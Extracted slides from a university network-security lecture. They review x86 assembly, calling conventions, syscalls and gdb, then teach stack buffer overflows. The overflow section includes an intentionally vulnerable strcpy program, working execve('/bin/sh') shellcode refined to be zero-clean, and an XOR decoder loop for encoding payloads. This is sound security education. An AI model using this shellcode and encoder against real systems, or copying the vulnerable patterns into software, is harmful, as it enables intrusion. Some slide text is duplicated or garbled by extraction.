CS 4740/6740 Network Security: Lecture 7: Memory Corruption (Assembly Review, Basic Exploits)

Download as pptx, pdf, or txt
Download as pptx, pdf, or txt
You are on page 1of 189

CS 4740/6740

Network Security
Lecture 7: Memory Corruption
(Assembly Review, Basic Exploits)
Assembly Review
Machine Model
Assembly Commands
Debugging
Assembly Review

Correspondence between a (relatively) high-level


language and the CPUs Instruction Set Architecture
(ISA)
System components
CPU, memory
Instructions
Formats, classes, control flow
Procedures
A Deep Topic
Compilers

Computers don't execute source code


Instead, they use machine code
Compilers translate code from a higher level to a lower
one
In this context, C assembly machine code
Assembly Language

Human-readable machine code


With a simple (usually 1-to-1) translation to machine code
We will focus on x86/x86_64
(Externally) CISC architectures
Instructions have side effects
Assembly syntaxes
Intel <mnemonic> <dst>, <src>
AT&T <mnemonic> <src>, <dst>
We will use Intel syntax
Compilation

-O0 -O3
abs:
push rbp
mov rbp, rsp
mov dword [rbp-0x8], edi
cmp dword [rbp-0x8], 0x0
jge .l0
abs:
mov eax, 0x0
mov eax, edi
sub eax, dword [rbp-0x8]
neg eax
mov dword [rbp-0x4], eax
cmovl eax, edi
jmp .l1
ret
.l0:
mov eax, dword [rbp-0x8]
mov dword [rbp-0x4], eax
.l1:
mov eax, dword [rbp-0x4]
pop rbp
ret
CPU and Memory

CPU and memory modeled on von Neumann


architecture
Co-mingled code and data in memory
Shared bus for code and data
CPU has a program counter with address of next
instruction
Repeated instruction cycles, usually pipelined loop (fetch
decode execute)
Instruction Set Architectures (ISAs) have an operational
semantics (input state operation output state)
CPU and Memory

CPU contains registers


Program counter (eip, rip)
Stack pointer (esp, rsp)
Frame pointer (ebp, rbp)
General purpose registers (e.g, [er][abcd]x, r8-r15)
Condition codes (eflags, rflags)
Stores results of arithmetic and logical operations
Memory stores code and data
Byte-addressable array
x86 Registers (32 bit)
General purpose registers
EAX, EBX, ECX, EDX
Used for pretty much anything
Stack registers
ESP: Points to the top of the stack
The stack grows down, so this is the lowest address
EBP: Points to the bottom of the current stack frame
Not strictly necessary, may be used as a general purpose
register
Other registers
EIP: Points to the currently executing instruction
EFLAGS: Bit vector of flags
Stores things like carry (after addition), equals zero (after a
comparison), etc.
Register Layout
x86 has gone through 16, 32, and 64 bit
versions
Registers can be addressed in whole or in part
64 bits RAX
32 bits EAX
16 bits AX
8 bit high and AH AL
low
Condition Codes (Flags Register)

Flags register is treated as a bit vector of flags


Automatically set and tested by many instructions
Examples
OF Overflow flag
DF Direction flag (loops)
SF Sign flag
ZF Zero flag
Instruction Formats
Mnemonic Operands
nop empty
neg eax
add eax, 0x10
mov eax, edx
mov eax, byte [edx]
mov eax, dword [edx+ecx*4]
jmp 0x08042860
jmp [edi]
Operand Types
Literals
Integer constant directly encoded into the instruction
e.g., mov eax, 0x00 (constant 0 moved into eax)
Registers
Contents of named register
e.g., mov eax, edx (edx moved into eax)
Memory references
e.g., mov eax, dword [edx]
Memory References

Base Starting address of byte Obvious


reference word 16 bits
Index Offset from base dword 32 bits (double
address word)
Scale Constant multiplier of qword 64 bits (quad
index word)

Displacement Constant base


Memory References
// For example, this C snippet...
int data[8];
data[1] = 4;

; ...might translate to
lea eax, [ebp-0x40]
mov edx, 0x04
mov ecx, 0x01
mov dword [eax+ecx*4], edx
Instruction Classes
Instructions commonly grouped by type of operation
Load/store, arithmetic, logic, comparison, control transfer
We'll go through a few common examples from each
Impossible to cover everything here
Compile programs, disassemble the output or capture assembly,
and investigate!
Loads, Stores
Instruction Effect Description

mov y, x yx Move y to x

movsx y, x y SignEx(x) Move sign-extended y to x

movzx y, x y ZeroEx(x) Move zero-extended y to x

esp esp - 4 Decrement stack pointer by 4,


push x
Mem(esp) x store x on the stack
x Mem(esp) Load top of stack in x,
pop x
esp esp + 4 increment stack pointer by 4

lea y, x y Addr(x) Store address of x to y


Endian-ness

The x86 family is a little-endian architecture


Multi-byte values stored least-significant byte
first
For example, if you have a uint8_t pointer to an
address a
What is the value of x[0]? x[3]?
Types?
Memory at this level is just a big chunk of bytes
No primitive types, structs, classes, ...
Data can have multiple interpretations
Signed or unsigned? Integer or string?
Store a 32-bit value, read back a 16-bit value
Overlapping loads, stores
Arithmetic
Instruction Effect Description

add y, x yy+x Add x to y

sub y, x yy-x Subtract x from y

r eax x Signed multiply of eax and x,


mul x edx High(r) high bits stored in edx, low
eax Low(r) bits stored in eax
r (edx:eax) / x Divides edx:eax by x,
div x edx Rem(r) remainder stored in edx,
eax Quo(r) quotient stored in eax
Logic
Instruction Effect Description

and y, x yyx Logical AND stored in y

or y, x yyx Logical OR stored in y

xor y, x yyx Logical XOR stored in y

shl y, x y ShiftLeft(x) Shift y left by x bits

shr y, x y ShiftRight(x) Shift y right by x bits

sal y, x y SShiftLeft(x) Signed left shift

rol y, x y RotateLeft(x) Rotate y left by x bits


Comparison

Instruction Effect Description

tyx
Perform logical AND, set SF if
SF MSB(t)
test y, x MSB set in result, set ZF if
ZF t = 0?
result is 0, ...
...

ty-x
Perform signed subtraction,
SF MSB(t)
cmp y, x set SF if MSB set in result, set
ZF t = 0?
ZF if result is 0, ...
...
Control Transfers
Control transfers change the control flow of programs
Can be predicated on results of a prior comparison
Arithmetic, logic instructions also set flags
Distinction between jumps and calls
Jumps transfer control, calls used to implement procedures
Distinction between direct and indirect transfers
Direct transfers use relative offsets, indirect transfers are absolute
through a register or memory reference

24
Control Transfers (Jumps)
Instruction Condition Description
jmp x unconditional Direct or indirect jump
je/jz x ZF Jump if equal
jne/jnz x ZF Jump if not equal
jl x SF OF Jump if less (signed)
jle x (SF OF) ZF Jump if less or equal (signed)
jg x (SF OF) ZF Jump if greater (signed)
jb x CF Jump if below (unsigned)
ja x CF ZF Jump if above (unsigned)
js x SF Jump if negative

25
Procedures
Procedures (functions) are intrinsically linked to the stack
Provides space for local variables
Records where to return to
Used to pass arguments (sometimes)
Implemented using stack frames, or activation records
Control Transfers (Calls)
Instruction Condition Description

Decrement esp by 4, store


esp esp - 4
successor instruction address
call x Mem(esp) Succ(eip)
on stack, jump to operand
eip Addr(x)
address

eip Mem(esp) Pop successor address into


ret
esp esp + 4 eip, increment esp by 4

eip Mem(esp) Pop successor address into


ret x
esp esp + x + 4 eip, increment esp by x + 4
Memory Layout
Stack Frames
int auth(const char* user) {
size_t i;
char buf[16];

strncpy(buf, user, sizeof(buf));


buf[sizeof(buf) - 1] = '\0';
for (i = 0; i < sizeof(buf); i++) {
buf[i] ^= 0xe5;
}

return !memcmp(buf, "secret", 6);


}

29
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...

_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret

30
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...

_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret

31
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...

_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret

32
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...

_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret

33
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...

_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret

34
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...

_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret

35
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...

_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret

36
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...

_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret

37
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...

_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret

38
Calling Conventions
Standards exist for procedures known as calling conventions
Specify where arguments are passed (registers, stack)
Specify the caller and callee's responsibilities
Who deallocates argument space on stack?
Which registers can be clobbered by callee, who must save
them?
Why do we need standards?
Interoperability code compiled by different toolchains must work
together
Calling Conventions
We often speak of callers and callees
Callers invoke a procedure i.e., call site
Callees are invoked i.e., call target
Conventions must specify how registers are dealt with
Could always save everything, but that's inefficient
Usually, some registers can be overwritten by the callee
(clobbered), others cannot
Registers that are clobbered are caller saved
Registers that must not be clobbered are callee saved
Calling Conventions

cdecl stdcall
stdcall_fn:
cdecl is the Linux 32 bit calling
; ...
convention pop ebp
Arguments passed on the ret 0x10 ; return and clean up
stack right to left (reverse arguments
order)
stdcall is used by the Win32 API,
eax, edx, ecx are caller
among others
saved (i.e., can be clobbered)
Almost identical to cdecl
Remaining registers are
However, the callee deallocates
callee saved
arguments on the stack
Return value in eax
Can you think of a reason why
Caller deallocates arguments
this is better or worse than
on stack after return
SysV AMD64 ABI
x86_64 calling convention used on Linux, Solaris, FreeBSD, Mac OS X
First six (integer) arguments passed in registers rdi, rsi, rdx, rcx, r8,
r9
(Except syscalls, where rcx r10)
Additional arguments spill to stack
Return value in rax
SysV AMD64 ABI Example
int auth(const char* user) {
size_t i;
char buf[16];
strncpy(buf, user, sizeof(buf));
// ...

_auth:
push rbp ; save previous frame pointer
mov rbp, rsp ; set new frame pointer
sub rsp, 0x30 ; allocate space for locals
movabs rdx, 0x10 ; move sizeof(buf) to rdx
lea rax, [rbp-0x20] ; get the address of buf
mov qword [rbp-0x08], rdi ; move user pointer into stack
mov rsi, qword [rbp-0x08] ; mov user pointer back into rsi
mov rdi, rax ; move buf into rdi
call _strncpy ; call strncpy(rdi, rsi, rdx)
; ...
System Calls
Systems calls are special control flow transfers from program code to
OS code
Used to access OS-level APIs and devices
Accept parameters just like other procedures/functions
But the argument passing format is different
Change protection-level from Userland (Ring 3) to Kernel Mode
(Ring 0)
Also implemented using stack frames
But again, things are more complicated vs. intra-program control
flow transfers
System Calls
Instruction Condition Description

esp esp - 4
Mem(esp) Succ(eip) Push eip, code segment, flags, esp, and
esp esp 4 stack segment onto the stack. Disable
Mem(esp) cs protected mode (by modifing flags).
int x
Change eip to the address of the
eflags eflags & interrupt handler specified in the
DISABLE_PROTECTION_MASK Interrupt Vector Table (IVT)
eip Addr(IVT[x])

Similar to int. Pushes key registers,


syscall/sysent disables protection, changes eip to the

er address of the system call handler
specified by the OS in the GDT.
System Call Example
1. Software executes int 0x80
Pushes EIP, CS, and EFLAGS
Main Memory
2. CPU transfers execution to the OS
OS Code
handler
Look up the handler in the IVT printf()
Switch from ring 3 to 0 0x80
Handler
3. OS executes the system call Syscall
Save the processes state Table
Use EAX to locate the system call
Execute the system call

EI
Restore the processes state User

P Program
Put the return value in EAX
4. Return to the process with iret IVT
Pops EIP, CS, and EFLAGS
46
Switches from ring 0 to 3
Writing in Assembly
Ok, enough review, let's write a program
In keeping with the slides, we'll use an Intel syntax assembler called
nasm
yasm also works, feel free to use GNU gas if you can't stand Intel
syntax
Let's write the simplest possible program
Not hello world, instead /bin/true
/bin/true
bits 64 ; we're writing a 64 bit program
section .text ; place this in the main code section

extern _exit ; we reference a global symbol (exit)


; libc functions are prefixed with '_'

global _start ; declare _start as a global symbol


; this creates a symbol table entry
; required for linker, runtime loader

_start: ; _start is the default ELF entry point


mov rdi, 0x00 ; zero out rdi, the first argument
call _exit; call exit(rdi=0)
int3 ; raise a breakpoint if we get here (we shouldnt)
Assembling, Linking
1. nasm -f elf64 -o true.o true.asm
First assemble the program to an object file true.o
2. ld -o true true.o -lc
Link it as an ELF executable against libc
3. /lib64/ld-linux-x86-64.so.2 ./true
Run it using a runtime loader
4. echo $?
Check the exit code (should be 0)
Disassembly
Disassembly is the process of recovering assembly from machine
code
Not to be confused with decompilation
Requires knowledge of binary format and ISA
Distinction between linear sweep and recursive descent
Linear sweep begins at an address and continues sequentially until
an error or the buffer is exhausted
Recursive descent begins at an address and follows program
control flow, (hopefully) discovering all reachable code
objdump
> objdump -d -M intel true

0000000000400230 <_start>:
400230: 48 c7 c7 00 00 00 00 mov rdi,0x0
400237: e8 e4 ff ff ff call 400220 <_exit@plt>
40023c: cc int3

Tool to display information about binary objects for a multitude of


architectures
Includes a simple linear sweep disassembler
objdump
> objdump -x true

true: file format elf64-x86-64


true
architecture: i386:x86-64, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x0000000000400230

Also useful for understanding ELF objects

52
System Calls
Systems calls are special control flow transfers from program code to
OS code
Used to access OS-level APIs and devices
Accept parameters just like other procedures/functions
But the argument passing format is different
Change protection-level from Userland (Ring 3) to Kernel Mode
(Ring 0)
Also implemented using stack frames
But again, things are more complicated vs. intra-program control
flow transfers
System Calls
Instruction Condition Description

esp esp - 4
Mem(esp) Succ(eip) Push esp, code segment, flags, esp, and
esp esp 4 stack segment onto the stack. Disable
Mem(esp) cs protected mode (by modifing flags).
int x
Change eip to the address of the
eflags eflags & interrupt handler specified in the
DISABLE_PROTECTION_MASK Interrupt Vector Table (IVT)
eip Addr(IVT[x])

Similar to int. Pushes key registers,


syscall/sysent disables protection, changes eip to the

er address of the system call handler
specified by the OS in the GDT.
System Call Example
1. Software executes int 0x80
Pushes EIP, CS, and EFLAGS
Main Memory
2. CPU transfers execution to the OS
OS Code
handler
Look up the handler in the IVT printf()
Switch from ring 3 to 0 0x80
Handler
3. OS executes the system call Syscall
Save the processes state Table
Use EAX to locate the system call
Execute the system call

EI
Restore the processes state User

P Program
Put the return value in EAX
4. Return to the process with iret IVT
Pops EIP, CS, and EFLAGS
55
Switches from ring 0 to 3
Invoking Syscalls
We can of course bypass libc and directly ask the kernel for services
Sometimes done in exploits to avoid defenses
Need to know the syscall number (index into kernel syscall table)
Methods differ by OS, architecture
Linux/x86_64 syscall
Linux/x86 int 0x80
Let's write a program to print a message and exit cleanly

56
Invoking Syscalls
bits 64 ; as before...
section .text

global _start

_start:
mov rdx, msg_len ; len(msg) to rdx
mov rsi, msg ; msg to rsi
mov rdi, 1 ; fd 1 (stdout) to rdi
mov rax, 1 ; write is syscall 1
syscall ; call write(rdi, rsi, rdx)

mov rdi, 0 ; status code 0 to rdi


mov rax, 60 ; exit is syscall 60
syscall ; call exit(rdi)

int3

section .data

msg: db 'Hello World',0x0a ; our message data


msg_len: equ $-msg ; len is $ (cur_addr) - msg
Invoking Syscalls
> nasm -f elf64 -o hello.o hello.asm
> ld -o hello hello.o
> ./hello
Hello World
> echo $?
0

You should see something similar to the above


Notice we didn't need to link against libc
And, we don't need to invoke the runtime loader
Debugging
Sometimes your program (or exploit) is buggy
An interactive debugger can be useful in that case
Start, stop execution
Set breakpoints, watchpoints
Directly inspect memory and CPU state
Modify program state
Let's look at debugging binary programs with gdb
(Some differences from programs with source)
Initializing gdb
> cat ~/.gdbinit
set disassembly-flavor intel
set follow-fork-mode child
set detach-on-fork off
disp/i $rip

Initial setup
Set default disassembly syntax
Display current instruction at each step
Control how gdb deals with programs that fork()
Also useful for setting breakpoints, scripting program execution to
known interesting state, etc.
Let's debug hello from before
Starting gdb
> gdb hello
GNU gdb (GDB) 7.8
[...]
(gdb) b _start
Breakpoint 1 at 0x4000b0
(gdb)
We load the program in gdb and set a breakpoint at _start
Breakpoints insert (by default) a software interrupt at the given
address (int3)
When int3 executes, control transfers to gdb
Original instruction is restored and executed
Then, the int3 is restored
Running the program
(gdb) r
Starting program: [...]/hello
Breakpoint 1, 0x00000000004000b0 in _start ()
1: x/i $rip
=> 0x4000b0 <_start>: movabs rdx,0x4

We run the program and immediately hit our breakpoint, as expected


Our display command prints the current instruction
Single-Stepping
(gdb) si
0x00000000004000ba in _start ()
1: x/i $rip
=> 0x4000ba <_start+10>: mov rsi,0x6000e4
(gdb)
0x00000000004000c1 in _start ()
1: x/i $rip
=> 0x4000c1 <_start+17>: mov rdi,0x1
(gdb)
0x00000000004000c8 in _start ()
1: x/i $rip
=> 0x4000c8 <_start+24>: mov rax,0x1
(gdb)
0x00000000004000cf in _start ()
1: x/i $rip
=> 0x4000cf <_start+31>: syscall

We can step the program instruction-by-instruction


Inspecting State
(gdb) p $rax
$1 = 1
(gdb) p $rsi
$2 = 6291684
(gdb) p/x $rsi
$3 = 0x6000e4
(gdb) x/s $rsi
0x6000e4: "wat\n"
p (print) prints values, e.g., register contents
x (examine) dereferences addresses
Formatting suffixes, width control display
/x for hex, /4xw for four 32 bit values in hex
/s for null-terminated strings
Stack Inspection
(gdb) x/8xb $rsp
0x7fffffffe430: 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) x/8xg $rsp
0x7fffffffe430: 0x0000000000000001 0x00007fffffffe670
0x7fffffffe440: 0x0000000000000000 0x00007fffffffe6aa
0x7fffffffe450: 0x00007fffffffe6b6 0x00007fffffffe6c5
0x7fffffffe460: 0x00007fffffffe6d6 0x00007fffffffe6df

The stack can be inspected by referencing $rsp


Repetition suffix (above, 8)
Widths (b bytes, w dwords, g qwords, ...)
Dumping CPU
(gdb) i reg
rax 0x1 1
rbx 0x0 0
rcx 0x0 0
rdx 0x4 4
rsi 0x6000e4 6291684
rdi 0x1 1
rbp 0x0 0x0
rsp 0x7fffffffe430 0x7fffffffe430
[...]
rip 0x4000cf 0x4000cf <_start+31>
eflags 0x202 [ IF ]

We can dump the entire (visible) CPU state


Continuing Execution
(gdb) c
Continuing.
Hello World
[Inferior 1 (process 52390) exited normally]

And, we can continue execution


Here, we exit since we don't hit the breakpoint again
And, we print out our string
gdb Cheatsheet
Command Usage
breakpoint p Set a breakpoint at an address, line number, or
bp function name
print p Print the value of a variable, pointer, or register
pp
x /[num][format][width] p Inspect num bytes of memory, printing using format.
Treat the memory as values of width.
info [reg, frame, locals, Print the contents of the CPU registers, current frame,
args] local variables, and arguments
i [reg, frame, locals, args]
backtrace Print out the current frames on the stack
bt
run <arg1> <arg2> Run the program with the given arguments
<arg3>
r <arg1> <arg2>
<arg3>
step/next, stepi/nexti Execute the next line of code or instruction (next
s/n, si/ni doesnt enter functions)
continue Run the program until the next breakpoint, or until it
Smashing the Stack
Basics
Shellcode Development
Exploit Construction
Stack-based Overflows
Stack-based buffer overflows are the quintessential memory
corruption vulnerability
Problem known since the 1970s
First known exploitation by the Morris work in 1998
Rediscovered in a 1995 Bugtraq post
Smashing the Stack for Fun and Profit (Aleph One, Phrack 1996)
People realized they were everywhere, and a serious security problem
Stack-based Overflows
Vulnerability stems from several factors
Low-level languages are not memory-safe
Control information is stored inline with user data on the stack
Overflowing (writing past the end of) a stack buffer could allow users
to control saved return addresses
When a function returns using a corrupted stack frame, the user
then controls execution
Vulnerable Program
int main(int argc, char** argv) {
char buf[256];
strcpy(buf, argv[1]);
printf("%s\n", buf);
return 0;
}

This program is clearly vulnerable


strcpy performs no bounds-checking, relying instead on finding a
terminating null character
Input is untrusted, and could be longer than the size of buf
Let's look at the mechanics of an exploit
Vulnerable Program
main:
push rbx ; callee saves rbx
sub rsp, 0x100 ; allocate storage
mov rsi, qword [rsi+0x8] ; move argv[1] to rsi
lea rbx, [rsp] ; move buf to rbx
mov rdi, rbx ; move buf to rdi
call 0x4004c0 ; strcpy(rdi, rsi)
mov rdi, rbx ; move buf to rdi
call 0x4004d0 ; puts(rdi)
xor eax, eax ; set eax to 0
add rsp, 0x100 ; deallocate storage
pop rbx ; restore rbx
ret ; return?
Smashing the Stack
main:
push rbx ; callee saves rbx
sub rsp, 0x100 ; allocate storage
mov rsi, qword [rsi+0x8] ; move argv[1] to
rsi
lea rbx, [rsp] ; move buf to rbx
mov rdi, rbx ; move buf to rdi
call 0x4004c0 ; strcpy(rdi, rsi)
mov rdi, rbx ; move buf to rdi
call 0x4004d0 ; puts(rdi)
xor eax, eax ; set eax to 0
add rsp, 0x100 ; deallocate storage
pop rbx ; restore rbx
ret ; return?
Smashing the Stack
main:
push rbx ; callee saves rbx
sub rsp, 0x100 ; allocate storage
mov rsi, qword [rsi+0x8] ; move argv[1] to
rsi
lea rbx, [rsp] ; move buf to rbx
mov rdi, rbx ; move buf to rdi
call 0x4004c0 ; strcpy(rdi, rsi)
mov rdi, rbx ; move buf to rdi
call 0x4004d0 ; puts(rdi)
xor eax, eax ; set eax to 0
add rsp, 0x100 ; deallocate storage
pop rbx ; restore rbx
ret ; return?
Smashing the Stack
main:
push rbx ; callee saves rbx
sub rsp, 0x100 ; allocate storage
mov rsi, qword [rsi+0x8] ; move argv[1] to
rsi
lea rbx, [rsp] ; move buf to rbx
mov rdi, rbx ; move buf to rdi
call 0x4004c0 ; strcpy(rdi, rsi)
mov rdi, rbx ; move buf to rdi
call 0x4004d0 ; puts(rdi)
xor eax, eax ; set eax to 0
add rsp, 0x100 ; deallocate storage
pop rbx ; restore rbx
ret ; return?
Smashing the Stack
main:
push rbx ; callee saves rbx
sub rsp, 0x100 ; allocate storage
mov rsi, qword [rsi+0x8] ; move argv[1] to
rsi
lea rbx, [rsp] ; move buf to rbx
mov rdi, rbx ; move buf to rdi
call 0x4004c0 ; strcpy(rdi, rsi)
mov rdi, rbx ; move buf to rdi
call 0x4004d0 ; puts(rdi)
xor eax, eax ; set eax to 0
add rsp, 0x100 ; deallocate storage
pop rbx ; restore rbx
ret ; return?
Smashing the Stack
main:
push rbx ; callee saves rbx
sub rsp, 0x100 ; allocate storage
mov rsi, qword [rsi+0x8] ; move argv[1] to
rsi
lea rbx, [rsp] ; move buf to rbx
mov rdi, rbx ; move buf to rdi
call 0x4004c0 ; strcpy(rdi, rsi)
mov rdi, rbx ; move buf to rdi
call 0x4004d0 ; puts(rdi)
xor eax, eax ; set eax to 0
add rsp, 0x100 ; deallocate storage
pop rbx ; restore rbx
ret ; return?
Smashing the Stack
main:
push rbx ; callee saves rbx
sub rsp, 0x100 ; allocate storage
mov rsi, qword [rsi+0x8] ; move argv[1] to
rsi
lea rbx, [rsp] ; move buf to rbx
mov rdi, rbx ; move buf to rdi
call 0x4004c0 ; strcpy(rdi, rsi)
mov rdi, rbx ; move buf to rdi
call 0x4004d0 ; puts(rdi)
xor eax, eax ; set eax to 0
add rsp, 0x100 ; deallocate storage
pop rbx ; restore rbx
ret ; return?
Smashing the Stack
In the previous example, we overwrite the saved instruction pointer
When the program returns from main, control transfers to a
location of the attacker's choosing
Potential overwrite targets aren't limited to the IP
Procedure arguments
Frame pointer
User data
User Data Overwrites
void suid_cmd(const char* user_input) {
uid_t uid;
char buf[64];
uid = get_nobody();
strcpy(buf, user_input);
setuid(uid);
system(buf);
}
Frame Pointer Overwrites
void f(const char* data) {
char buf[256];
int i;
for (i = 0; i <= 256; i++)
buf[i] = data[i];
puts(buf);
}

int main(int argc, char** argv) {


f(argv[1]);
return 0;
}
Frame Pointer Overwrites
main: f:
push rbp push rbp
mov rbp, rsp mov rbp, rsp
sub rsp, rbp sub rsp, 0x100
mov rdi, qword [rsi+0x8] mov rax, rdi
call f lea rbx, [rsp]
xor eax, eax mov edx, 0x101
mov rsp, rbp mov rdi, rbx
pop rbp mov rsi, rax
ret call memcpy
mov rdi, rbx
call puts
add rsp, 0x100
pop rbp
ret
Payloads
The classic attack when exploiting an overflow is to inject a payload
Sometimes called shellcode, since often the goal is to obtain a
privileged shell (but not always!)
Some defenses aim to prevent this stage of exploitation
We will be writing our own payloads
Metasploit is cheating at this stage :-)
Writing Payloads
1. What payload to inject?
We'll start by writing a classic shellcode for the example vulnerable
program
2. Where is the payload located in memory?
We'll place our payload on the stack
Requires that the stack is executable
3. Where to place the address of the payload?
Shellcode
void launch_shell(void) {
char path[] = "/bin/sh";
char* argv[] = { path, NULL, };
char* envp[] = { NULL, };
execve(path, argv, envp);
}

int main(int argc, char** argv) {


launch_shell();
return 0;
}
Shellcode (Take 1)
launch_shell:
push rbp
mov rbp, rsp mov rdi, r8
sub rsp, 0x50 mov qword ptr [rbp-0x38], rsi
lea rax, [rbp-0x28] mov esi, edx
lea rsi, [rbp-0x20] mov rdx, qword ptr [rbp-0x30]
mov qword ptr [rbp-0x40], rax
lea rcx, [rbp-0x8]
mov qword ptr [rbp-0x48], rcx
mov edx, 0x0 call memset
movabs rdi, 0x8 mov rdi, qword ptr [rbp-0x48]
mov r8, qword ptr ds:0x400704 mov rsi, qword ptr [rbp-0x38]
mov qword ptr [rbp-0x8], r8 mov rdx, qword ptr [rbp-0x40]
call execve
mov qword ptr [rbp-0x20], rcx
mov dword ptr [rbp-0x4c], eax
mov qword ptr [rbp-0x18], 0x0 add rsp, 0x50
mov r8, rax pop rbp
mov qword ptr [rbp-0x30], rdi ret
Shellcode Analysis
The previous listing is close, but has problems
1. It references "/bin/sh" in the data segment
2. It calls memset and execve in libc
3. It is verbose
We want to be as self-contained as possible
. i.e., position-independent, no libc, no data segment
The smaller the better
. Might have a small target buffer, or need to place many copies of
the payload, or use a NOP sled
Shellcode (Take 2)
launch_shell:
sub rsp, 0x100 ; move rsp to a safe location
mov rax, 0x68732f6e69622f ; /bin/sh
mov qword [rsp+0x20], rax ; put /bin/sh pointer on stack
lea rdi, [rsp+0x20] ; get pointer to /bin/sh pointer
mov qword [rsp+0x10], rdi ; put it on the stack
mov qword [rsp+0x18], 0x00 ; terminate argv
mov qword [rsp+0x08], 0x00 ; terminate envp
lea rsi, [rsp+0x10] ; get pointer to argv
lea rdx, [rsp+0x08] ; get pointer to envp
mov rax, 59 ; execve is syscall 59
syscall ; execve(rdi, rsi, rdx)
Zero-Clean Shellcode
Our shellcode is full of zeroes!
strcpy stops copying when reaching the end of the input in this
case, a null terminator
Creating "zero-clean" shellcode is a common requirement
Whenever payload is processed by a string operation
Other operations might be performed on your buffer
Your exploit has to account for them
Zero-clean shellcode is only a special case of the more general
payload constraint problem
Shellcode (Take 3)
launch_shell: > ndisasm -b 64 payload.bin
sub rsp, byte 0xf0
00000000 4883ECF0 sub rsp,byte -0x10
xor rcx, rcx 00000004 4831C9 xor rcx,rcx
mov rdx, rcx 00000007 4889CA mov rdx,rcx
mov qword [rsp+0x28], rdx 0000000A 4889542428 mov [rsp+0x28],rdx
mov rdx, 0x68732f2f6e69622f 0000000F 48BA2F62696E2F2F
mov rdx,0x68732f2f6e69622f7368
mov qword [rsp+0x20], rdx 00000019 4889542420 mov [rsp+0x20],rdx
lea rdi, [rsp+0x20] 0000001E 488D7C2420 lea rdi,[rsp+0x20]
mov qword [rsp+0x10], rdi 00000023 48897C2410 mov [rsp+0x10],rdi
mov qword [rsp+0x18], rcx 00000028 48894C2418 mov [rsp+0x18],rcx
0000002D 48894C2408 mov [rsp+0x8],rcx
mov qword [rsp+0x08], rcx 00000032 488D742410 lea rsi,[rsp+0x10]
lea rsi, [rsp+0x10] 00000037 488D542408 lea rdx,[rsp+0x8]
lea rdx, [rsp+0x08] 0000003C 4889C8 mov rax,rcx
mov rax, rcx 0000003F B03B mov al,0x3b
00000041 0F05 syscall
mov al, byte 59
syscall
Shellcode Analysis
We're now zero-clean, and this will work
We zero rcx immediately using the xor trick and use it to place
zeroes where necessary
We avoid zero-padded constants by using smaller-width
instructions
We also saved two bytes (now at 67)
Let's see one more useful trick
Shellcode (Take 4)
BITS 64

launch_shell:
sub rsp, byte 0x78
xor rcx, rcx
mov byte [rel pad], cl
lea rdi, [rel path]
mov qword [rsp+0x10], rdi
mov qword [rsp+0x18], rcx
mov qword [rsp+0x08], rcx
lea rsi, [rsp+0x10]
lea rdx, [rsp+0x08]
mov rax, rcx
mov al, byte 59
syscall

path db '/bin/sh'
pad db 0x0a
Shellcode Analysis
jmp .str ; jump to our string
.str_ret:
pop eax ; pop addr into eax
; ...
.str:
call .str_ret ; return to payload
db '/bin/sh' ; our string

We referenced position-independent data using RIP-relative addressing


New addition to x86_64 ISA
(But, now we're not zero-clean...)
(A different trick is used on x86, above)
Decoder Loops
Our nice relative addressing re-introduced zeroes
In general, modifying payloads to bypass all transformations
doesn't scale
Payload might need to be zero-clean, alphanumeric, double-
encoded, ...
Fortunately, there's a general solution to this problem
We will introduce a small decoding loop
Only the loop has to be adjusted, not the entire payload
Decoder Loops
Simple Decoder
BITS 64
%define payload_len (60 / 8) + 1 ; payload length / 8
%define key 0xffffffffffffffff ; expanded key

_start:
xor rax, rax ; zero rax
mov rcx, rax ; zero rcx
mov cl, byte payload_len ; set decode length
mov rsi, key ; mov rsi, key
jmp .get_payload ; get payload addr
.payload_ret:
pop rdi ; pop addr
.decode:
mov rdx, qword [rdi+rax*8] ; load current qword
xor rdx, rsi ; decode it
mov qword [rdi+rax*8], rdx ; store decoded qword
inc rax ; increment index
loop .decode ; loop while rcx > 0
jmp .payload ; execute the payload

.get_payload:
call .payload_ret
.payload:
Encoded Payload
1. Uses the jmpcall trick to get the payload address
2. Loops over encoded payload, decodes qword chunks
. A simple brute-force search will provide you a suitable key most of
the time
Decoders can be much more complex, of course
Added complexity not worth it here
But, decoders are highly useful in general
Locating the Shellcode
Enough shellcode tricks for now, let's finish the exploit
Where will we put the (possibly encoded) payload?
Since the stack is executable here, let's put it there
What's actually on the stack?
Stack Layout
Locating the Shellcode
In our case, we could go for either the frame copy, or the original
argument copy
What problem could we run into if we use the frame buffer copy?
